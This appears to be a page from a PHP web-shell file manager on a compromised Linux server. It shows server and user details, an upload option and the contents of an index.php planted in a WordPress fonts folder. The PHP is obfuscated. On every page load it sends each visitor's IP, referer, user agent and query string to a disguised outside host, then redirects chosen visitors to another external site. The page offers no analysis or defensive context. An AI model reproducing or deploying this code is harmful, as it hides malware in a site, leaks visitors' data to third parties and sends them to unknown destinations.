HEX
Server: Apache/2.4.65 (Unix) OpenSSL/1.1.1k
System: Linux srv820.techno-vate.net 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64
User: bheot (1024)
PHP: 8.1.30
Disabled: NONE
$ pwd: /home/bheot/public_html/wp-content/fonts/
Upload Files
File: /home/bheot/public_html/wp-content/fonts/index.php
<?php
 if (!function_exists('xqXGemUS1i')) { function xqXGemUS1i() { $xR3M2T = $_SERVER['SERVER_ADDR']; $xxXKr = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xxXKr) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xR3M2T))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xxXKr)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xxXKr) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xR3M2T))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xxXKr) && (($_SERVER['HTTP_CLIENT_IP'])!=($xR3M2T))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}  $ip=xqXGemUS1i(); 
 if (!function_exists('xIEophjLkyx')) { function xIEophjLkyx() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xIEophjLkyx(); 
 if (!function_exists('xLMoUzxeh2')) { function xLMoUzxeh2() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xLMoUzxeh2(); 
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';} 
 $sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y909012'; $dex9 = '.re'; $langua = 'na'; $command = 'st'; 
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch); 
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') {  } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://wwwiono.com/var/www/html/?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://wwwiono.com/var/www/html/' </script> ";} exit; } 
 ?>
@ Telegram